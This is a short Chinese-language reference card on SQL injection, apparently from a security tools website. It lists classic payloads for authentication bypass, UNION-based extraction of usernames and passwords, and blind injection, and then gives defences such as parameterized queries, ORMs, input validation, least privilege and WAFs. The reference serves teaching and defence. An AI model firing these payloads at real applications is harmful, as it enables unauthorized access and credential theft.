SQL 注入参考

常见攻击模式

-- 经典绕过
' OR '1'='1
admin'--
' OR 1=1--

-- 联合查询
' UNION SELECT username,password FROM users--

-- 盲注
' AND SLEEP(5)--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--

防护方法

参数化查询db.Query("SELECT * FROM users WHERE id=?", id)
ORM UsageUser.objects.filter(id=user_id)
输入验证查询前验证类型、长度、格式
最小权限数据库用户应具有最小权限
WAFWeb 应用防火墙过滤恶意查询

相关工具推荐

🔒 SSL 证书检查 检查网站 SSL 证书状态与有效期 🧮 密码熵计算 计算密码的信息熵和破解难度 🛡 XSS 参考 XSS 测试载荷与防御方案参考 🛡 CSP 生成 生成 Content Security Policy 策略 🔑 OAuth 构建 构建 OAuth 2.0 授权请求参数 🔍 敏感信息检测 检测文本中的密钥、密码等敏感信息 🔒 哈希算法参考 常见哈希算法速查与安全性参考 🔐 SSL/TLS 参考 SSL/TLS 协议版本与密码套件参考 🎫 JWT 最佳实践 JWT 安全使用指南与常见错误 🌐 CORS 安全指南 CORS 跨域配置安全最佳实践 限流模式参考 令牌桶、滑动窗口等限流算法参考 🔍 依赖审计参考 npm/pip/go 依赖安全审计命令